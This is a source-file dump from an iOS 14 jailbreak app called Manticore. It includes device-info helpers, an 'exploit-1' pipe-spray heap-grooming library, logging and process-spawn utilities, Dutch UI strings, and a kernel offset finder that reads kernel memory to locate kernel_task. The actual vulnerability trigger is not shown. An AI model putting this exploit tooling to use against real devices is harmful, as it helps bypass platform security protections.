// Read one sysctl string into a strdup()ed copy. As in the inline code this replaces,
// a failed lookup aborts through assert().
static char *sysctl_string_dup(const char *name)
{
    char buf[256];
    size_t len = sizeof(buf);
    int err = sysctlbyname(name, buf, &len, NULL, 0);
    assert(err == 0);
    (void)err;
    return strdup(buf);
}

// Populate g_exp with physical memory size, page size and the identifying strings
// (model, OS build, product version, machine, kernel version). Runs only once; later
// calls return immediately.
void sys_init(void) {
    static bool inited = false;
    if (inited) {
        return;
    }

    size_t len = sizeof(g_exp.physmemsize);
    int err = sysctlbyname("hw.memsize", &g_exp.physmemsize, &len, NULL, 0);
    assert(err == 0);
    len = sizeof(g_exp.pagesize);
    err = sysctlbyname("hw.pagesize", &g_exp.pagesize, &len, NULL, 0);
    assert(err == 0);
    (void)err;

    // The strings are never freed; they live for the whole process.
    g_exp.model            = sysctl_string_dup("hw.model");
    g_exp.osversion        = sysctl_string_dup("kern.osversion");
    g_exp.osproductversion = sysctl_string_dup("kern.osproductversion");
    g_exp.machine          = sysctl_string_dup("hw.machine");
    g_exp.kern_version     = sysctl_string_dup("kern.version");

    inited = true;
}
55 |
// Log the machine, model, kernel and iOS version strings collected by sys_init().
// Page size and RAM size lines are intentionally disabled.
void print_os_details(void)
{
    const struct exploit_common_s *sys = &g_exp;
    util_info("Machine Name: %s", sys->machine);
    util_info("Model Name: %s", sys->model);
    util_info("Kernel Version: %s", sys->kern_version);
    // util_info("Kernel Page Size: %#llx", sys->pagesize);
    // util_info("Ram Size: %.1f MB", sys->physmemsize / 1024.0 / 1024.0);
    util_info("System Version: iOS %s (%s)", sys->osproductversion, sys->osversion);
}
65 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/user_kernel_alloc.c:
--------------------------------------------------------------------------------
1 | //
2 | // user_kernel_alloc.h
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/30.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 |
19 | // ---------------------------------------------------------------------------
20 | // pipe spray
21 | // ---------------------------------------------------------------------------
22 |
// Close both ends of a pipe pair: the read end (index 0) first, then the write end.
void pipe_close(int pipefds[2]) {
	for (int end = 0; end < 2; end++) {
		close(pipefds[end]);
	}
}
27 |
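/*
 * set_nonblock
 *
 * Description:
 * 	Set the O_NONBLOCK flag on the specified file descriptor. Currently unused (the
 * 	call in create_pipes() is commented out).
 *
 * 	If F_GETFL fails (invalid descriptor) nothing is changed: previously the -1 result
 * 	was OR'ed with O_NONBLOCK and handed to F_SETFL, i.e. a request to set every
 * 	flag bit on a descriptor that does not exist.
 */
static void __unused set_nonblock(int fd) {
	int flags = fcntl(fd, F_GETFL);
	if (flags == -1) {
		return;
	}
	fcntl(fd, F_SETFL, flags | O_NONBLOCK);
}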
39 |
// Create *pipe_count pipes and return their descriptors as an array of
// [read0, write0, read1, write1, ...]. Stops early if pipe() fails or hands back a
// negative descriptor, but then asserts, so on return *pipe_count is unchanged.
// Marking the write ends nonblocking is disabled (see the commented call).
int *create_pipes(size_t *pipe_count) {
	size_t wanted = *pipe_count;
	int *fds = calloc(2 * wanted, sizeof(int));
	assert(fds != NULL);
	size_t made = 0;
	while (made < wanted) {
		int pair[2] = { -1, -1 };
		// pipe() has been seen to report success with invalid descriptors once the
		// file limit is reached, so validate both ends, not just the return code.
		int ok = pipe(pair) == 0 && pair[0] >= 0 && pair[1] >= 0;
		if (!ok) {
			pipe_close(pair);
			break;
		}
		//set_nonblock(pair[1]);
		fds[2 * made] = pair[0];
		fds[2 * made + 1] = pair[1];
		made++;
	}
	assert(made == wanted && "can't alloc enough pipe fds");
	// Shrink the array to what was actually created.
	int *shrunk = realloc(fds, 2 * made * sizeof(int));
	assert(shrunk != NULL);
	*pipe_count = made;
	return shrunk;
}
71 |
// Close every pipe pair in an array produced by create_pipes().
void close_pipes(int *pipefds, size_t pipe_count) {
	int *pair = pipefds;
	int *end = pipefds + 2 * pipe_count;
	for (; pair < end; pair += 2) {
		pipe_close(pair);
	}
}
77 |
// Write pipe_buffer_size - 1 bytes of pipe_buffer into the write end of each pipe,
// calling `update` (if given) with the pipe index before each write so the buffer can
// be customised. Stops at the first short write and returns how many pipes were filled.
size_t pipe_spray(const int *pipefds, size_t pipe_count,
		void *pipe_buffer, size_t pipe_buffer_size,
		void (^update)(uint32_t pipe_index, void *data, size_t size)) {
	assert(pipe_count <= 0xffffff);
	assert(pipe_buffer_size > 512);
	const size_t chunk = pipe_buffer_size - 1;   // the last byte is deliberately withheld
	size_t filled = 0;
	while (filled < pipe_count) {
		if (update) {
			update((uint32_t)filled, pipe_buffer, pipe_buffer_size);
		}
		ssize_t n = write(pipefds[2 * filled + 1], pipe_buffer, chunk);
		if (n != chunk) {
			// Most likely the pipe buffer budget is exhausted; the remaining
			// writes would fail the same way.
			break;
		}
		filled++;
	}
	return filled;
}
102 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/utils.c:
--------------------------------------------------------------------------------
1 | //
2 | // utils.c
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/24.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 |
22 | static void util_vprintf(const char *fmt, va_list ap);
23 |
// Dump `len` bytes at `data` as a hex table: 16 bytes per row, a 16-bit offset at the
// start of each row and an extra space after the 8th byte. `desc`, when non-NULL, is
// printed on its own line first. Output goes through util_printf().
void util_hexprint(void *data, size_t len, const char *desc)
{
    const uint8_t *bytes = data;

    if (desc) {
        util_printf("%s\n", desc);
    }
    size_t i = 0;
    for (; i < len; i++) {
        size_t col = i % 16;
        if (col == 0) {
            util_printf("%04x: ", (uint16_t)i);
        }
        util_printf("%02x ", bytes[i]);
        if (col == 7) {
            util_printf(" ");
        } else if (col == 15) {
            util_printf("\n");
        }
    }
    // Terminate a partial final row.
    if (i % 16) {
        util_printf("\n");
    }
}
48 |
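// Dump `len` bytes at `data` as 8-, 4-, 2- or 1-byte words (`width`), 16 bytes per row
// with an offset prefix and a gap after the first 8 bytes. `desc` is printed first when
// non-NULL.
//
// Fixes: a width of 0 or less previously never advanced `i` (endless loop) and is now
// treated as 1; words are fetched with memcpy() instead of a possibly unaligned
// pointer cast; and a trailing partial word is printed byte by byte instead of
// reading past the end of the buffer.
void util_hexprint_width(void *data, size_t len, int width, const char *desc)
{
    const uint8_t *bytes = data;
    size_t i;

    if (width <= 0) {
        width = 1;
    }
    if (desc) {
        util_printf("%s\n", desc);
    }
    for (i = 0; i < len; i += width) {
        size_t remain = len - i;
        if (i % 16 == 0) {
            util_printf("%04x: ", (uint16_t)i);
        }
        if (width == 8 && remain >= 8) {
            uint64_t v;
            memcpy(&v, bytes + i, sizeof(v));
            util_printf("%016llx ", (unsigned long long)v);
        }
        else if (width == 4 && remain >= 4) {
            uint32_t v;
            memcpy(&v, bytes + i, sizeof(v));
            util_printf("%08x ", v);
        }
        else if (width == 2 && remain >= 2) {
            uint16_t v;
            memcpy(&v, bytes + i, sizeof(v));
            util_printf("%04x ", v);
        }
        else if (width == 8 || width == 4 || width == 2) {
            // Fewer than `width` bytes left: show them individually.
            for (size_t k = 0; k < remain; k++) {
                util_printf("%02x ", bytes[i + k]);
            }
        }
        else {
            // Any other width prints one byte per step, as before.
            util_printf("%02x ", bytes[i]);
        }
        if ((i + width) % 16 == 8) {
            util_printf(" ");
        }
        if ((i + width) % 16 == 0) {
            util_printf("\n");
        }
    }
    if (i % 16 != 0) {
        util_printf("\n");
    }
}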
84 |
85 | void util_nanosleep(uint64_t nanosecs)
86 | {
87 | int ret;
88 | struct timespec tp;
89 | tp.tv_sec = nanosecs / (1000 * 1000 * 1000);
90 | tp.tv_nsec = nanosecs % (1000 * 1000 * 1000);
91 | do {
92 | ret = nanosleep(&tp, &tp);
93 | } while (ret && errno == EINTR);
94 | }
95 |
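// Sleep for `ms` milliseconds.
// `ms * 1000 * 1000` was evaluated in unsigned int, so any ms above 4294 (about 4.3 s)
// wrapped and slept far too little; widen before multiplying.
void util_msleep(unsigned int ms)
{
    util_nanosleep((uint64_t)ms * 1000 * 1000);
}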
101 |
// Format the failure message, print it and then park the calling thread forever
// (one-second sleeps) instead of exiting -- presumably so the on-screen log stays visible.
_Noreturn static void vfail(const char *fmt, va_list ap)
{
    char text[512];
    vsnprintf(text, sizeof(text), fmt, ap);
    util_printf("[!] fail < %s >\n", text);
    util_printf("[*] endless loop\n");
    for (;;) {
        util_msleep(1000);
    }
}
112 |
// If `cond` is true, report the printf-style message through vfail() and never return;
// otherwise do nothing.
void fail_if(bool cond, const char *fmt, ...)
{
    if (!cond) {
        return;
    }
    va_list ap;
    va_start(ap, fmt);
    vfail(fmt, ap);   // does not return
    va_end(ap);       // unreachable; kept for symmetry with va_start
}
122 |
// Print a fixed failure message (`info`, or "null" when NULL) and park the thread forever.
_Noreturn void fail_info(const char *info)
{
    const char *text = info ? info : "null";
    util_printf("[!] fail < %s >\n", text);
    util_printf("[*] endless loop\n");
    for (;;) {
        util_msleep(1000);
    }
}
131 |
132 | void (*log_UI)(const char *text) = NULL;
133 |
// Format a log line, prefix it with a level marker and emit it to stdout and, when
// set, to log_UI. Level letters map to markers: I -> '+', W -> '!', E -> '-';
// 'D' and anything else are printed as given.
static void log_vprintf(int type, const char *fmt, va_list ap)
{
    char message[256];
    vsnprintf(message, sizeof(message), fmt, ap);

    int marker;
    switch (type) {
    case 'I': marker = '+'; break;
    case 'W': marker = '!'; break;
    case 'E': marker = '-'; break;
    default:  marker = type; break;
    }
    fprintf(stdout, "[%c] %s\n", marker, message);
    if (0) {
        // Disabled CFLog() mirror; compiled but never executed.
        CF_EXPORT void CFLog(int32_t level, CFStringRef format, ...);
        CFLog(6, CFSTR("[%c] %s\n"), marker, message);
    }
    if (log_UI) {
        char ui_text[512];
        snprintf(ui_text, sizeof(ui_text), "[%c] %s\n", marker, message);
        log_UI(ui_text);
    }
}
156 |
// Log a printf-style message at debug level ('D' marker).
void util_debug(const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    log_vprintf('D', fmt, args);
    va_end(args);
}
164 |
// Log a printf-style message at info level ('+' marker).
void util_info(const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    log_vprintf('I', fmt, args);
    va_end(args);
}
172 |
// Log a printf-style message at warning level ('!' marker).
void util_warning(const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    log_vprintf('W', fmt, args);
    va_end(args);
}
180 |
// Log a printf-style message at error level ('-' marker).
void util_error(const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    log_vprintf('E', fmt, args);
    va_end(args);
}
188 |
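// Print a formatted line to stdout and mirror it to log_UI when that sink is set.
// A va_list may only be consumed once, so the copy for the second formatting pass is
// taken up front; previously `ap` was reused after vfprintf() (undefined behaviour,
// garbage or a crash in the UI mirror).
static void util_vprintf(const char *fmt, va_list ap)
{
    va_list ap_ui;
    va_copy(ap_ui, ap);
    vfprintf(stdout, fmt, ap);
    if (log_UI) {
        char ui_text[512];
        vsnprintf(ui_text, sizeof(ui_text), fmt, ap_ui);
        log_UI(ui_text);
    }
    va_end(ap_ui);
}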
198 |
// printf()-style wrapper around util_vprintf(): stdout plus the optional log_UI sink,
// with no level marker.
void util_printf(const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    util_vprintf(fmt, args);
    va_end(args);
}
206 |
207 | extern char **environ;
208 |
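/*
 * runCommandv
 *
 * Description:
 * 	Spawn `cmd` with the NULL-terminated `argv`, echo its stdout/stderr through
 * 	util_printf() and wait for it to exit.
 *
 * Parameters:
 * 	cmd		Path of the executable.
 * 	argc		Unused (argv is NULL-terminated); kept for the caller's interface.
 * 	argv		NULL-terminated argument vector, argv[0] being the command.
 * 	unrestrict	Optional block invoked with the child's pid while the child is held
 * 			suspended (POSIX_SPAWN_START_SUSPENDED); the child is then resumed.
 *
 * Returns:
 * 	The waitpid() status, or the posix_spawn() error shifted into the WEXITSTATUS
 * 	position when spawning failed.
 *
 * Fixes: a read() error previously stored a terminator at buf[-1] and kept looping
 * forever; `unrestrict`/kill() were invoked with an uninitialized pid when
 * posix_spawn() failed; the spawn attribute and file-action objects were never destroyed.
 */
static int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t))
{
    pid_t pid = -1;
    posix_spawn_file_actions_t *actions = NULL;
    posix_spawn_file_actions_t actionsStruct;
    int out_pipe[2] = { -1, -1 };
    bool valid_pipe = false;
    posix_spawnattr_t *attr = NULL;
    posix_spawnattr_t attrStruct;

    (void)argc;

    // Route the child's stdout and stderr into our pipe; the child drops both
    // inherited pipe ends so that EOF is seen once it exits.
    valid_pipe = pipe(out_pipe) == 0;
    if (valid_pipe && posix_spawn_file_actions_init(&actionsStruct) == 0) {
        actions = &actionsStruct;
        posix_spawn_file_actions_adddup2(actions, out_pipe[1], 1);
        posix_spawn_file_actions_adddup2(actions, out_pipe[1], 2);
        posix_spawn_file_actions_addclose(actions, out_pipe[0]);
        posix_spawn_file_actions_addclose(actions, out_pipe[1]);
    }

    // Start suspended only when there is a callback to run before the child proceeds.
    if (unrestrict && posix_spawnattr_init(&attrStruct) == 0) {
        attr = &attrStruct;
        posix_spawnattr_setflags(attr, POSIX_SPAWN_START_SUSPENDED);
    }

    int rv = posix_spawn(&pid, cmd, actions, attr, (char *const *)argv, environ);

    // posix_spawn() no longer needs these once it has returned; release them here
    // so no return path below leaks them.
    if (actions) {
        posix_spawn_file_actions_destroy(actions);
    }
    if (attr) {
        posix_spawnattr_destroy(attr);
    }

    // `pid` is only meaningful when the spawn succeeded.
    if (rv == 0 && unrestrict) {
        unrestrict(pid);
        kill(pid, SIGCONT);
    }

    if (valid_pipe) {
        close(out_pipe[1]);   // keep only the read end, otherwise read() never hits EOF
    }

    if (rv == 0) {
        if (valid_pipe) {
            char buf[256];
            for (;;) {
                ssize_t len = read(out_pipe[0], buf, sizeof(buf) - 1);
                if (len == 0) {
                    break;   // EOF: the child's copies of the write end are gone
                }
                if (len < 0) {
                    if (errno == EINTR) {
                        continue;
                    }
                    perror("posix_spawn, read pipe");
                    break;
                }
                buf[len] = 0;
                util_printf("%s", buf);
            }
        }
        if (waitpid(pid, &rv, 0) == -1) {
            util_error("ERROR: Waitpid failed");
        } else {
            util_info("%s(%d) completed with exit status %d", __FUNCTION__, pid, WEXITSTATUS(rv));
        }
    } else {
        util_error("%s(%d): ERROR posix_spawn failed (%d): %s", __FUNCTION__, pid, rv, strerror(rv));
        rv <<= 8; // Put error into WEXITSTATUS
    }
    if (valid_pipe) {
        close(out_pipe[0]);
    }
    return rv;
}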
275 |
276 | int util_runCommand(const char *cmd, ...)
277 | {
278 | va_list ap, ap2;
279 | int argc = 1;
280 |
281 | va_start(ap, cmd);
282 | va_copy(ap2, ap);
283 |
284 | while (va_arg(ap, const char *) != NULL) {
285 | argc++;
286 | }
287 | va_end(ap);
288 |
289 | const char *argv[argc+1];
290 | argv[0] = cmd;
291 | for (int i=1; i
9 | #import "AppDelegate.h"
10 |
/* Process entry point: hands control to UIKit with AppDelegate as the
 * application delegate (UIApplicationMain normally never returns). */
int main(int argc, char * argv[]) {
    @autoreleasepool {
        NSString *delegateClassName = NSStringFromClass([AppDelegate class]);
        return UIApplicationMain(argc, argv, nil, delegateClassName);
    }
}
16 |
--------------------------------------------------------------------------------
/manticore/manticore.entitlements:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | get-task-allow
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/manticore/nl.proj/LaunchScreen.strings:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/manticore/nl.proj/Main.strings:
--------------------------------------------------------------------------------
1 | /* Class = "UILabel"; text = "Set APNonce"; ObjectID = "0yi-4F-L8u"; */
2 | "0yi-4F-L8u.text" = "Zet APNonce";
3 |
4 | /* Class = "UILabel"; text = "Enable Tweaks"; ObjectID = "2Nf-dY-FJy"; */
5 | "2Nf-dY-FJy.text" = "Tweaks Aanzetten";
6 |
7 | /* Class = "UILabel"; text = "Disable Screen Time"; ObjectID = "8Oy-13-2xy"; */
8 | "8Oy-13-2xy.text" = "Schakel Scherm Tijd uit";
9 |
10 | /* Class = "UILabel"; text = "Package Management"; ObjectID = "8lS-uL-LxK"; */
11 | "8lS-uL-LxK.text" = "Package Management";
12 |
13 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "AVZ-qX-0ms"; */
14 | "AVZ-qX-0ms.text" = "Herstel RootFS";
15 |
16 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "B09-wX-UeI"; */
17 | "B09-wX-UeI.normalTitle" = "Jailbreak";
18 |
19 | /* Class = "UILabel"; text = "Show Log Window"; ObjectID = "GyA-VR-ZRI"; */
20 | "GyA-VR-ZRI.text" = "Laat Log Window Zien";
21 |
22 | /* Class = "UITextField"; placeholder = "0x1111111111111111"; ObjectID = "JaD-0s-nbo"; */
23 | "JaD-0s-nbo.placeholder" = "0x1111111111111111";
24 |
25 | /* Class = "UILabel"; text = "Disable Updates"; ObjectID = "K4g-i5-DXs"; */
26 | "K4g-i5-DXs.text" = "Updates Blokkeren";
27 |
28 | /* Class = "UILabel"; text = "Settings"; ObjectID = "KVP-vA-4W2"; */
29 | "KVP-vA-4W2.text" = "Instellingen";
30 |
31 | /* Class = "UIButton"; normalTitle = "Save & Set APNonce"; ObjectID = "WEh-zy-xS5"; */
32 | "WEh-zy-xS5.normalTitle" = "APNonce Opslaan & Zetten";
33 |
34 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "bFz-pN-VmJ"; */
35 | "bFz-pN-VmJ.text" = "Herstel RootFS";
36 |
37 | /* Class = "UIButton"; normalTitle = "Options"; ObjectID = "czz-vo-cHF"; */
38 | "czz-vo-cHF.normalTitle" = "Instellingen";
39 |
40 | /* Class = "UILabel"; text = "Block OTA Updates"; ObjectID = "efL-nQ-xsh"; */
41 | "efL-nQ-xsh.text" = "OTA Updates Blokkeren";
42 |
43 | /* Class = "UILabel"; text = "Max Memory Limit"; ObjectID = "hav-yD-P83"; */
44 | "hav-yD-P83.text" = "Max Geheugen Limiet";
45 |
46 | /* Class = "UILabel"; text = "Compatibility"; ObjectID = "i1H-yX-3n8"; */
47 | "i1H-yX-3n8.text" = "Compatibiliteit";
48 |
49 | /* Class = "UILabel"; text = "Load Daemons"; ObjectID = "kFD-2g-aOl"; */
50 | "kFD-2g-aOl.text" = "Laad Daemons";
51 |
52 | /* Class = "UILabel"; text = "Remove ScreenTime"; ObjectID = "kyq-MK-M3C"; */
53 | "kyq-MK-M3C.text" = "Verwijder Schermtijd";
54 |
55 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "mUJ-nK-XHv"; */
56 | "mUJ-nK-XHv.text" = "Manticore";
57 |
58 | /* Class = "UILabel"; text = "Load Tweaks"; ObjectID = "ntj-8w-lbe"; */
59 | "ntj-8w-lbe.text" = "Laad Tweaks";
60 |
61 | /* Class = "UILabel"; text = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!"; ObjectID = "o5h-H3-igh"; */
62 | "o5h-H3-igh.text" = "Je iPhone 11 Pro op iOS 14.3 is compatible met Manticore!";
63 |
64 | /* Class = "UITextView"; text = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda."; ObjectID = "oZg-Pf-ew7"; */
65 | "oZg-Pf-ew7.text" = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda.";
66 |
67 | /* Class = "UILabel"; text = "Log ECID"; ObjectID = "voS-Ev-D3K"; */
68 | "voS-Ev-D3K.text" = "Log ECID";
69 |
70 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "xtR-ck-MtY"; */
71 | "xtR-ck-MtY.text" = "iOS 14.0 - 14.3";
72 |
73 | /* Class = "UILabel"; text = "Toggle Log Window"; ObjectID = "yiE-wg-tPU"; */
74 | "yiE-wg-tPU.text" = "Toggle Log Window";
75 |
--------------------------------------------------------------------------------
/manticore/offset_finder/offset_finder.mm:
--------------------------------------------------------------------------------
1 | /*
2 | kernel_task offset finder for cicuta_virosa, untested
3 | (c) fugiefire 01/03/2021
4 | */
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include "k_offsets.h"
13 | #include "log.hpp"
14 | #include "../include/lib/tq/kapi.h"
15 |
16 | /* define this to 0 when reading from live mem, 1 when testing on a decompressed kcache */
17 | #define TESTENV 0
18 | #define KBASE 0xFFFFFFF007004000
19 | #define KSIZE 0x0000000003000000
20 |
21 | typedef uint64_t kptr_t;
22 |
#if TESTENV
/* Test-bench readers: `addr` is a plain in-process pointer into a decompressed
 * kernelcache that has been loaded into this process, so a direct dereference
 * is all that is needed. Only meaningful when TESTENV is 1. */
void kapi_read(kptr_t addr, void *data, size_t len) { memcpy(data, (void*)addr, len); }
uint32_t kapi_read32(kptr_t addr) { return *(uint32_t *)addr; }
uint64_t kapi_read64(kptr_t addr) { return *(uint64_t *)addr; }
#else
/* Live-device readers: provided elsewhere (presumably the exploit's kernel
 * read primitive behind the kapi.h include above — confirm); `addr` is then a
 * kernel address. */
extern void kapi_read(kptr_t addr, void *data, size_t len);
extern uint32_t kapi_read32(kptr_t addr);
extern uint64_t kapi_read64(kptr_t addr);
#endif
32 |
33 | /* wrappers for future proofing */
/* Copy `n` bytes from `p` into `r` through the active kapi_read backend. */
void _kread(void *p, char *r, size_t n) {
  const kptr_t addr = (kptr_t)p;
  kapi_read(addr, r, n);
}
/* Fetch the 32-bit word at `p` through the active kapi_read32 backend. */
uint32_t _kread_32(void *p) {
  const kptr_t addr = (kptr_t)p;
  return kapi_read32(addr);
}
/* Fetch the 64-bit word at `p` through the active kapi_read64 backend. */
uint64_t _kread_64(void *p) {
  const kptr_t addr = (kptr_t)p;
  return kapi_read64(addr);
}
37 |
38 | /****** BMH ALGORITHM ******/
39 | /* https://en.wikipedia.org/wiki/Boyer%E2%80%93Moore%E2%80%93Horspool_algorithm */
40 |
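/* Build the Boyer-Moore-Horspool bad-character shift table for `needle`.
 *
 * table[c] is how far the window may advance when the byte under the window's
 * last slot is `c`: needle_len for bytes that do not occur in
 * needle[0..needle_len-2], otherwise the distance from that byte's last such
 * occurrence to the end of the needle. `table` must hold UCHAR_MAX + 1 entries.
 *
 * An empty needle yields an all-zero table; the first version computed
 * `needle_len - 1` in size_t, which underflowed for needle_len == 0 and walked
 * off the end of `needle`. */
void _bmh_table_gen(unsigned char const *needle, const size_t needle_len,
                    size_t table[]) {
  for (size_t c = 0; c <= UCHAR_MAX; c++)
    table[c] = needle_len;

  if (needle_len == 0)
    return;

  /* The final needle byte is deliberately excluded (i + 1 < needle_len). */
  for (size_t i = 0; i + 1 < needle_len; i++)
    table[needle[i]] = needle_len - 1 - i;
}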
48 |
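/* Boyer-Moore-Horspool search for `needle` in `haystack`.
 *
 * Returns a pointer to the first occurrence, or NULL when there is none, when
 * either pointer is NULL, when needle_len == 0 (the first version indexed
 * haystack[SIZE_MAX] in that case), or when the haystack is shorter than the
 * needle.
 *
 * NOTE: the haystack is read through the pointer directly, not via _kread, so
 * a caller passing a kernel address (see find_kernel_task) must be in a mode
 * where that address is dereferenceable from this process. The per-iteration
 * fflush(stdout) of the first version was dropped; it did no work. */
void *bmh_search(unsigned char const *needle, const size_t needle_len,
                 unsigned char *haystack, size_t haystack_len) {
  if (needle == NULL || haystack == NULL || needle_len == 0)
    return NULL;

  size_t table[UCHAR_MAX + 1] = {0};
  _bmh_table_gen(needle, needle_len, table);

  const size_t last = needle_len - 1;
  while (haystack_len >= needle_len) {
    /* Compare right to left; reaching index 0 with a match is a hit. */
    size_t i = last;
    while (haystack[i] == needle[i]) {
      if (i == 0)
        return (void *)haystack;
      i--;
    }

    /* Shift by the entry for the byte under the window's last slot. The shift
     * is at most needle_len, so haystack_len cannot underflow here. */
    const size_t shift = table[haystack[last]];
    haystack_len -= shift;
    haystack += shift;
  }

  return NULL;
}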
66 |
/****** AArch64 instruction decoding (ADRP / ADD immediate only) ******/
68 | typedef uint32_t aarch64_insn_t;
69 | typedef uint64_t u64;
70 | typedef uint32_t u32;
71 |
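/* AArch64 general-purpose register numbers, equal to their encoding in the
 * Rd/Rn/Rm fields. X6 was missing from the first version, which silently
 * shifted X7..X31 down by one; the explicit `= 0` plus the restored X6 pin
 * every name to its encoding. */
enum aarch64_reg {
  X0 = 0, X1, X2, X3, X4, X5, X6, X7, X8, X9,
  X10, X11, X12, X13, X14, X15, X16,
  X17, X18, X19, X20, X21, X22, X23,
  X24, X25, X26, X27, X28, X29, X30,
  X31
};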
79 |
/* The only instruction classes get_insn_type distinguishes. */
enum aarch64_insn_type {
  UNK = 0,  /* anything not listed below */
  ADRP = 1, /* PC-relative page address */
  ADD = 2   /* ADD (immediate), 64-bit */
};
83 |
84 | /* starting to regret not using capstone */
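/* Classify a 32-bit AArch64 instruction word as ADRP, ADD (immediate, 64-bit)
 * or UNK. Only those two forms are needed by find_xref_to.
 *
 * ADRP: bit 31 set and bits 28..24 == 0b10000 (mask 0x9F000000); bit 31 in
 *       the mask keeps ADR (same opcode, bit 31 clear) out.
 * ADD:  bits 31..23 == 1 0 0 1 0 0 0 1 0 (mask 0xFF800000, value 0x91000000),
 *       i.e. sf=1, op=0, S=0, the ADD-immediate opcode and bit 23 clear.
 *       The first version masked only bits 31..24, so ADDG (same top byte,
 *       bit 23 set) was reported as ADD and its fields then mis-decoded by
 *       _extract_add_imm; including bit 23 in the mask rejects it. */
enum aarch64_insn_type get_insn_type(aarch64_insn_t insn) {
  if ((insn & 0x9F000000) == 0x90000000)
    return ADRP;
  if ((insn & 0xFF800000) == 0x91000000)
    return ADD;
  return UNK;
}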
90 |
/* Decode the page address an ADRP instruction materialises.
 *
 * `off`   address of the ADRP word itself (its PC); only the page part
 *         (bits above 11) contributes.
 * `insn`  the 32-bit ADRP word.
 * `print` unused; kept for the existing callers.
 *
 * Returns PC_page + SignExtend(immhi:immlo) << 12, as the hardware computes. */
long long _extract_adrp_imm(u64 off, aarch64_insn_t insn, int print) {
  (void)print;

  /* immlo sits in bits 30..29, immhi in bits 23..5 (19 bits). */
  const u64 immlo = (insn >> 29) & 0x3;
  const u64 immhi = (insn >> 5) & 0x7FFFF;
  u64 imm21 = (immhi << 2) | immlo;

  /* Sign-extend the 21-bit field, then scale it to whole pages. */
  if (imm21 & (1ULL << 20))
    imm21 |= ~0x1FFFFFULL;
  const u64 page_delta = imm21 << 12;

  /* The base is the page containing the instruction. */
  const u64 pc_page = off & ~0xFFFULL;
  return (long long)(page_delta + pc_page);
}
111 |
/* Decode the immediate of an ADD (immediate) word: imm12 from bits 21..10,
 * shifted left by 12 when the shift field (bits 23..22) is 0b01.
 *
 * For shift field 0b10/0b11 (bit 23 set, i.e. the ADDG form rather than a
 * plain ADD) the raw imm12 is returned unshifted, exactly as before;
 * get_insn_type is expected to have filtered such words out. */
u32 _extract_add_imm(aarch64_insn_t insn) {
  const u32 imm12 = (insn >> 10) & 0xFFF;
  const u32 shift_field = (insn >> 22) & 0x3;
  return shift_field == 0x1 ? (imm12 << 12) : imm12;
}
128 |
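/* Scan the instruction stream [from, to) — both offsets relative to
 * `haystack` — for an ADRP, or an ADRP+ADD pair, that materialises `ref`.
 *
 * Returns the absolute address (haystack + offset) of the matching ADRP, or
 * NULL if none is found. Instruction words are fetched through _kread_32, so
 * `haystack` may be a kernel address when that reader talks to a live kernel.
 *
 * Changes relative to the first version:
 *  - the ADD following an ADRP is only consulted if it is still inside
 *    [from, to) and its source register is the ADRP's destination
 *    (Rn of ADD == Rd of ADRP); an unrelated ADD after an ADRP no longer
 *    yields a false xref;
 *  - the ADD immediate is added rather than OR'd, which is also correct for
 *    the `lsl #12` form (OR only worked for an unshifted imm12). */
void *find_xref_to(void *ref, void *haystack, void *from, void *to) {
  const u64 base = (u64)haystack;
  u64 off = (u64)from & ~(u64)3; /* insn align */
  const u64 end = (u64)to & ~(u64)3;

  while (off < end) {
    const u64 insn_addr = base + off;
    const aarch64_insn_t insn = _kread_32((void *)insn_addr);

    if (get_insn_type(insn) == ADRP) {
      const u64 page = (u64)_extract_adrp_imm(insn_addr, insn, 0);

      /* ADRP alone reaches `ref` when it is page aligned. */
      if (page == (u64)ref)
        return (void *)insn_addr;

      /* Otherwise look for the ADD that applies the page offset. */
      if (off + 4 < end) {
        const aarch64_insn_t next = _kread_32((void *)(insn_addr + 4));
        const unsigned adrp_rd = insn & 0x1F;
        const unsigned add_rn = (next >> 5) & 0x1F;
        if (get_insn_type(next) == ADD && add_rn == adrp_rd &&
            page + _extract_add_imm(next) == (u64)ref)
          return (void *)insn_addr;
      }
    }

    /* next insn */
    off += 4;
  }

  return NULL;
}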
168 |
169 |
